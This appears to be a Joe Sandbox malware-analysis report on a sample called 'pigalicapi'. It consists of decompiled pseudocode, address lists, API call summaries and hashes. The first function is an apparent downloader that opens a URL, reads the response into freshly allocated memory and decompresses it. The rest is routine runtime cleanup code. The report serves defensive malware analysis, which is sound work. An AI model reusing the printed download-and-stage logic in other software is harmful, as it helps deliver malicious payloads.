                                                                                                                                                                                                                                                                            				void _v100;
                                                                                                                                                                                                                                                                            				void _v356;
                                                                                                                                                                                                                                                                            				long _v360;
                                                                                                                                                                                                                                                                            				long _v364;
                                                                                                                                                                                                                                                                            				intOrPtr _v368;
                                                                                                                                                                                                                                                                            				void* _v372;
                                                                                                                                                                                                                                                                            				long _v376;
                                                                                                                                                                                                                                                                            				void* _v380;
                                                                                                                                                                                                                                                                            				signed char _v381;
                                                                                                                                                                                                                                                                            				long _v388;
                                                                                                                                                                                                                                                                            				long _v392;
                                                                                                                                                                                                                                                                            				void* _v396;
                                                                                                                                                                                                                                                                            				char _v652;
                                                                                                                                                                                                                                                                            				long _v656;
                                                                                                                                                                                                                                                                            				long _v660;
                                                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                                                            				void* _t140;
                                                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                                                            				long _t149;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if( *0x1183b80 == 0 || _a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                            					L25:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					memcpy( &_v84, "Accept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip, deflate\r\n", 0x10 << 2);
                                                                                                                                                                                                                                                                            					asm("movsw");
                                                                                                                                                                                                                                                                            					asm("movsb");
                                                                                                                                                                                                                                                                            					_v92 = 0x80000200;
                                                                                                                                                                                                                                                                            					if((_a16 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_v92 = _v92 | 0x00803000;
                                                                                                                                                                                                                                                                            						_v96 = 4;
                                                                                                                                                                                                                                                                            						_t139 =  *0x1183b80; // 0x0
                                                                                                                                                                                                                                                                            						InternetQueryOptionA(_t139, 0x1f,  &_v100,  &_v96);
                                                                                                                                                                                                                                                                            						_v100 = _v100 | 0x00000100;
                                                                                                                                                                                                                                                                            						_t140 =  *0x1183b80; // 0x0
                                                                                                                                                                                                                                                                            						InternetSetOptionA(_t140, 0x1f,  &_v100, 4);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t142 =  *0x1183b80; // 0x0
                                                                                                                                                                                                                                                                            					_v88 = InternetOpenUrlA(_t142, _a4,  &_v84, 0x42, _v92, 0);
                                                                                                                                                                                                                                                                            					if(_v88 == 0) {
                                                                                                                                                                                                                                                                            						_v660 = GetLastError();
                                                                                                                                                                                                                                                                            						goto L25;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_v360 = 0x100;
                                                                                                                                                                                                                                                                            						E01177D20( &_v356,  &_v356, 0, 0x100);
                                                                                                                                                                                                                                                                            						_v364 = 0;
                                                                                                                                                                                                                                                                            						if(HttpQueryInfoA(_v88, 0x13,  &_v356,  &_v360,  &_v364) == 0) {
                                                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                                                            							InternetCloseHandle(_v88);
                                                                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v368 = E01177DD0( &_v356);
                                                                                                                                                                                                                                                                            						if(_v368 != 0xc8) {
                                                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v372 = VirtualAlloc(0, _a12, 0x3000, 4);
                                                                                                                                                                                                                                                                            						if(_v372 == 0) {
                                                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v388 = 0;
                                                                                                                                                                                                                                                                            						_v376 = 0;
                                                                                                                                                                                                                                                                            						_v380 = _v372;
                                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                                            							InternetReadFile(_v88, _v380, _a12,  &_v376);
                                                                                                                                                                                                                                                                            							if(_v376 == 0) {
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v388 = _v388 + _v376;
                                                                                                                                                                                                                                                                            							_v380 = _v380 + _v376;
                                                                                                                                                                                                                                                                            							_t149 = _a12 - _v376;
                                                                                                                                                                                                                                                                            							_a12 = _t149;
                                                                                                                                                                                                                                                                            							if(_t149 >= 0) {
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							L16:
                                                                                                                                                                                                                                                                            							_v8 = _v388;
                                                                                                                                                                                                                                                                            							_v396 = _v372;
                                                                                                                                                                                                                                                                            							_v392 = 0x100;
                                                                                                                                                                                                                                                                            							E01177D20(_v388,  &_v652, 0, 0x100);
                                                                                                                                                                                                                                                                            							_v381 = 0;
                                                                                                                                                                                                                                                                            							if(HttpQueryInfoA(_v88, 0x1d,  &_v652,  &_v392,  &_v364) != 0 && lstrcmpiA( &_v652, "gzip") == 0) {
                                                                                                                                                                                                                                                                            								_v656 = E01172E00(_v388, _v372, _v388, _a8, _a12);
                                                                                                                                                                                                                                                                            								if(_v656 > 0) {
                                                                                                                                                                                                                                                                            									_v8 = _v656;
                                                                                                                                                                                                                                                                            									_v396 = _a8;
                                                                                                                                                                                                                                                                            									_v381 = 1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if((_v381 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            								E01177B70(_a8, _v372, _v8);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							VirtualFree(_v372, 0, 0x8000);
                                                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}



























                                                                                                                                                                                                                                                                            0x01172afb
                                                                                                                                                                                                                                                                            0x01172b09
                                                                                                                                                                                                                                                                            0x01172df2
                                                                                                                                                                                                                                                                            0x01172dfa
                                                                                                                                                                                                                                                                            0x01172b2d
                                                                                                                                                                                                                                                                            0x01172b3a
                                                                                                                                                                                                                                                                            0x01172b3c
                                                                                                                                                                                                                                                                            0x01172b3e
                                                                                                                                                                                                                                                                            0x01172b3f
                                                                                                                                                                                                                                                                            0x01172b4c
                                                                                                                                                                                                                                                                            0x01172b57
                                                                                                                                                                                                                                                                            0x01172b5a
                                                                                                                                                                                                                                                                            0x01172b6b
                                                                                                                                                                                                                                                                            0x01172b72
                                                                                                                                                                                                                                                                            0x01172b81
                                                                                                                                                                                                                                                                            0x01172b8c
                                                                                                                                                                                                                                                                            0x01172b93
                                                                                                                                                                                                                                                                            0x01172b93
                                                                                                                                                                                                                                                                            0x01172ba9
                                                                                                                                                                                                                                                                            0x01172bb6
                                                                                                                                                                                                                                                                            0x01172bbd
                                                                                                                                                                                                                                                                            0x01172de0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172bc3
                                                                                                                                                                                                                                                                            0x01172bc3
                                                                                                                                                                                                                                                                            0x01172bdb
                                                                                                                                                                                                                                                                            0x01172be3
                                                                                                                                                                                                                                                                            0x01172c10
                                                                                                                                                                                                                                                                            0x01172dce
                                                                                                                                                                                                                                                                            0x01172dd2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172dd2
                                                                                                                                                                                                                                                                            0x01172c25
                                                                                                                                                                                                                                                                            0x01172c35
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172c4e
                                                                                                                                                                                                                                                                            0x01172c5b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172c61
                                                                                                                                                                                                                                                                            0x01172c6b
                                                                                                                                                                                                                                                                            0x01172c7b
                                                                                                                                                                                                                                                                            0x01172c81
                                                                                                                                                                                                                                                                            0x01172c97
                                                                                                                                                                                                                                                                            0x01172ca4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172cb4
                                                                                                                                                                                                                                                                            0x01172cc6
                                                                                                                                                                                                                                                                            0x01172ccf
                                                                                                                                                                                                                                                                            0x01172cd5
                                                                                                                                                                                                                                                                            0x01172cd8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172cdc
                                                                                                                                                                                                                                                                            0x01172cde
                                                                                                                                                                                                                                                                            0x01172ce4
                                                                                                                                                                                                                                                                            0x01172ced
                                                                                                                                                                                                                                                                            0x01172cf3
                                                                                                                                                                                                                                                                            0x01172d0b
                                                                                                                                                                                                                                                                            0x01172d13
                                                                                                                                                                                                                                                                            0x01172d3d
                                                                                                                                                                                                                                                                            0x01172d70
                                                                                                                                                                                                                                                                            0x01172d7d
                                                                                                                                                                                                                                                                            0x01172d85
                                                                                                                                                                                                                                                                            0x01172d8b
                                                                                                                                                                                                                                                                            0x01172d91
                                                                                                                                                                                                                                                                            0x01172d91
                                                                                                                                                                                                                                                                            0x01172d7d
                                                                                                                                                                                                                                                                            0x01172da1
                                                                                                                                                                                                                                                                            0x01172db2
                                                                                                                                                                                                                                                                            0x01172db7
                                                                                                                                                                                                                                                                            0x01172dc8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172dc8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01172ca6
                                                                                                                                                                                                                                                                            0x01172bbd

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 01172B72
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 01172B93
                                                                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000000,?,00000042,80000200,00000000), ref: 01172BB0
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 01172C08
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 01172C48
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 01172C97
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 01172D35
                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,gzip), ref: 01172D4B
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01172DC8
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 01172DD2
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01172DDA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 01172B32
                                                                                                                                                                                                                                                                            • gzip, xrefs: 01172D3F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$Query$HttpInfoOptionVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                                                                                                            • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                                                                                                            • API String ID: 2564233093-2863726208
                                                                                                                                                                                                                                                                            • Opcode ID: c5ba7f8ea08847c8c30baadae98cb9e330cf4a98ce849cc11091d3213069404f
                                                                                                                                                                                                                                                                            • Instruction ID: 882ce3b0b1d0f492b26066e11664127c2b05931ec0933ca3ab6caffec058c5e3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5ba7f8ea08847c8c30baadae98cb9e330cf4a98ce849cc11091d3213069404f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88914DB190421CEFDB29CF94DC48BEEB7B5BB48300F008199E519A7284DB745A85CF50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00C7AE4D(intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                                                                            				intOrPtr* _t31;
                                                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                                                            				intOrPtr* _t46;
                                                                                                                                                                                                                                                                            				intOrPtr* _t47;
                                                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                                                            				intOrPtr* _t70;
                                                                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t74 = _a4;
                                                                                                                                                                                                                                                                            				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                                                                                                                                                                                                            				if(_t25 != 0 && _t25 != 0xd0dae0) {
                                                                                                                                                                                                                                                                            					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                                                                                                                                                                                                            					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                                                                                                                                                                                                            						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                                                                                                                                                                                                            						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                                                                                                                                                                                                            							E00C7A8FB(_t46);
                                                                                                                                                                                                                                                                            							E00C7BCB5( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                                                                                                                                                                                                            						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                                                                                                                                                                                                            							E00C7A8FB(_t47);
                                                                                                                                                                                                                                                                            							E00C7BDB3( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						E00C7A8FB( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                                                                                                                                                                                                            						E00C7A8FB( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                                                                                                                                                                                                            				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                                                                                                                                                                                                            					E00C7A8FB( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                                                                                                                                                                                                            					E00C7A8FB( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                                                                                                                                                                                                            					E00C7A8FB( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                                                                                                                                                                                                            					E00C7A8FB( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E00C7AFC0( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                                                                                                                                                                                                            				_t28 = 6;
                                                                                                                                                                                                                                                                            				_t55 = _t74 + 0xa0;
                                                                                                                                                                                                                                                                            				_v8 = _t28;
                                                                                                                                                                                                                                                                            				_t70 = _t74 + 0x28;
                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t70 - 8)) != 0xd0d5a0) {
                                                                                                                                                                                                                                                                            						_t31 =  *_t70;
                                                                                                                                                                                                                                                                            						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                                                                                                                                                                                                            							E00C7A8FB(_t31);
                                                                                                                                                                                                                                                                            							E00C7A8FB( *_t55);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t28 = _v8;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                                                                                                                                                                                                            						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                                                                                                                                                                                                                            						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                                                                                                                                                                                                            							E00C7A8FB(_t29);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t28 = _v8;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t55 = _t55 + 4;
                                                                                                                                                                                                                                                                            					_t70 = _t70 + 0x10;
                                                                                                                                                                                                                                                                            					_t28 = _t28 - 1;
                                                                                                                                                                                                                                                                            					_v8 = _t28;
                                                                                                                                                                                                                                                                            				} while (_t28 != 0);
                                                                                                                                                                                                                                                                            				return E00C7A8FB(_t74);
                                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                                            0x00c7ae55
                                                                                                                                                                                                                                                                            0x00c7ae59
                                                                                                                                                                                                                                                                            0x00c7ae61
                                                                                                                                                                                                                                                                            0x00c7ae6a
                                                                                                                                                                                                                                                                            0x00c7ae6f
                                                                                                                                                                                                                                                                            0x00c7ae76
                                                                                                                                                                                                                                                                            0x00c7ae7e
                                                                                                                                                                                                                                                                            0x00c7ae86
                                                                                                                                                                                                                                                                            0x00c7ae91
                                                                                                                                                                                                                                                                            0x00c7ae97
                                                                                                                                                                                                                                                                            0x00c7ae98
                                                                                                                                                                                                                                                                            0x00c7aea0
                                                                                                                                                                                                                                                                            0x00c7aea8
                                                                                                                                                                                                                                                                            0x00c7aeb3
                                                                                                                                                                                                                                                                            0x00c7aeb9
                                                                                                                                                                                                                                                                            0x00c7aebd
                                                                                                                                                                                                                                                                            0x00c7aec8
                                                                                                                                                                                                                                                                            0x00c7aece
                                                                                                                                                                                                                                                                            0x00c7ae6f
                                                                                                                                                                                                                                                                            0x00c7aecf
                                                                                                                                                                                                                                                                            0x00c7aed7
                                                                                                                                                                                                                                                                            0x00c7aeea
                                                                                                                                                                                                                                                                            0x00c7aefd
                                                                                                                                                                                                                                                                            0x00c7af0b
                                                                                                                                                                                                                                                                            0x00c7af16
                                                                                                                                                                                                                                                                            0x00c7af1b
                                                                                                                                                                                                                                                                            0x00c7af24
                                                                                                                                                                                                                                                                            0x00c7af2c
                                                                                                                                                                                                                                                                            0x00c7af2d
                                                                                                                                                                                                                                                                            0x00c7af33
                                                                                                                                                                                                                                                                            0x00c7af36
                                                                                                                                                                                                                                                                            0x00c7af39
                                                                                                                                                                                                                                                                            0x00c7af40
                                                                                                                                                                                                                                                                            0x00c7af42
                                                                                                                                                                                                                                                                            0x00c7af46
                                                                                                                                                                                                                                                                            0x00c7af4e
                                                                                                                                                                                                                                                                            0x00c7af55
                                                                                                                                                                                                                                                                            0x00c7af5b
                                                                                                                                                                                                                                                                            0x00c7af5c
                                                                                                                                                                                                                                                                            0x00c7af5c
                                                                                                                                                                                                                                                                            0x00c7af63
                                                                                                                                                                                                                                                                            0x00c7af65
                                                                                                                                                                                                                                                                            0x00c7af6a
                                                                                                                                                                                                                                                                            0x00c7af72
                                                                                                                                                                                                                                                                            0x00c7af77
                                                                                                                                                                                                                                                                            0x00c7af78
                                                                                                                                                                                                                                                                            0x00c7af78
                                                                                                                                                                                                                                                                            0x00c7af7b
                                                                                                                                                                                                                                                                            0x00c7af7e
                                                                                                                                                                                                                                                                            0x00c7af81
                                                                                                                                                                                                                                                                            0x00c7af84
                                                                                                                                                                                                                                                                            0x00c7af84
                                                                                                                                                                                                                                                                            0x00c7af96

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 00C7AE91
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BCD2
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BCE4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BCF6
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BD08
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BD1A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BD2C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BD3E
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BD50
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BD62
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BD74
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BD86
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BD98
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCB5: _free.LIBCMT ref: 00C7BDAA
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7AE86
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7A8FB: HeapFree.KERNEL32(00000000,00000000,?,00C7BE4A,?,00000000,?,00000000,?,00C7BE71,?,00000007,?,?,00C7AFE5,?), ref: 00C7A911
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7A8FB: GetLastError.KERNEL32(?,?,00C7BE4A,?,00000000,?,00000000,?,00C7BE71,?,00000007,?,?,00C7AFE5,?,?), ref: 00C7A923
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7AEA8
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7AEBD
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7AEC8
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7AEEA
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7AEFD
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7AF0B
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7AF16
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7AF4E
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7AF55
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7AF72
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7AF8A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                                                                                                            • Opcode ID: d8c6b1b2eef54fa4189fbcfa7c54f7810134dd7791ebed13659303ac23c62519
                                                                                                                                                                                                                                                                            • Instruction ID: cc0a8fb42e9b38999a921dc58ff3175e71319cf1e4cb79f6b5110eff3cc89967
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8c6b1b2eef54fa4189fbcfa7c54f7810134dd7791ebed13659303ac23c62519
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC3160726047029FDB21AA78D849B5E73E5AF84310F10C429F4ADD72A1DF30AE919722
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00C79D5C(char _a4) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t26 = _a4;
                                                                                                                                                                                                                                                                            				_t52 =  *_a4;
                                                                                                                                                                                                                                                                            				if( *_a4 != 0xcc8098) {
                                                                                                                                                                                                                                                                            					E00C7A8FB(_t52);
                                                                                                                                                                                                                                                                            					_t26 = _a4;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E00C7A8FB( *((intOrPtr*)(_t26 + 0x3c)));
                                                                                                                                                                                                                                                                            				E00C7A8FB( *((intOrPtr*)(_a4 + 0x30)));
                                                                                                                                                                                                                                                                            				E00C7A8FB( *((intOrPtr*)(_a4 + 0x34)));
                                                                                                                                                                                                                                                                            				E00C7A8FB( *((intOrPtr*)(_a4 + 0x38)));
                                                                                                                                                                                                                                                                            				E00C7A8FB( *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                                                                                                                            				E00C7A8FB( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                                                                                                                                                                                                            				E00C7A8FB( *((intOrPtr*)(_a4 + 0x40)));
                                                                                                                                                                                                                                                                            				E00C7A8FB( *((intOrPtr*)(_a4 + 0x44)));
                                                                                                                                                                                                                                                                            				E00C7A8FB( *((intOrPtr*)(_a4 + 0x360)));
                                                                                                                                                                                                                                                                            				_v8 =  &_a4;
                                                                                                                                                                                                                                                                            				E00C79C22(5,  &_v8);
                                                                                                                                                                                                                                                                            				_v8 =  &_a4;
                                                                                                                                                                                                                                                                            				return E00C79C72(4,  &_v8);
                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                            0x00c79d62
                                                                                                                                                                                                                                                                            0x00c79d65
                                                                                                                                                                                                                                                                            0x00c79d6d
                                                                                                                                                                                                                                                                            0x00c79d70
                                                                                                                                                                                                                                                                            0x00c79d75
                                                                                                                                                                                                                                                                            0x00c79d78
                                                                                                                                                                                                                                                                            0x00c79d7c
                                                                                                                                                                                                                                                                            0x00c79d87
                                                                                                                                                                                                                                                                            0x00c79d92
                                                                                                                                                                                                                                                                            0x00c79d9d
                                                                                                                                                                                                                                                                            0x00c79da8
                                                                                                                                                                                                                                                                            0x00c79db3
                                                                                                                                                                                                                                                                            0x00c79dbe
                                                                                                                                                                                                                                                                            0x00c79dc9
                                                                                                                                                                                                                                                                            0x00c79dd7
                                                                                                                                                                                                                                                                            0x00c79ddf
                                                                                                                                                                                                                                                                            0x00c79de8
                                                                                                                                                                                                                                                                            0x00c79df0
                                                                                                                                                                                                                                                                            0x00c79e04

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79D70
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7A8FB: HeapFree.KERNEL32(00000000,00000000,?,00C7BE4A,?,00000000,?,00000000,?,00C7BE71,?,00000007,?,?,00C7AFE5,?), ref: 00C7A911
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7A8FB: GetLastError.KERNEL32(?,?,00C7BE4A,?,00000000,?,00000000,?,00C7BE71,?,00000007,?,?,00C7AFE5,?,?), ref: 00C7A923
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79D7C
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79D87
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79D92
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79D9D
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79DA8
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79DB3
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79DBE
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79DC9
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79DD7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
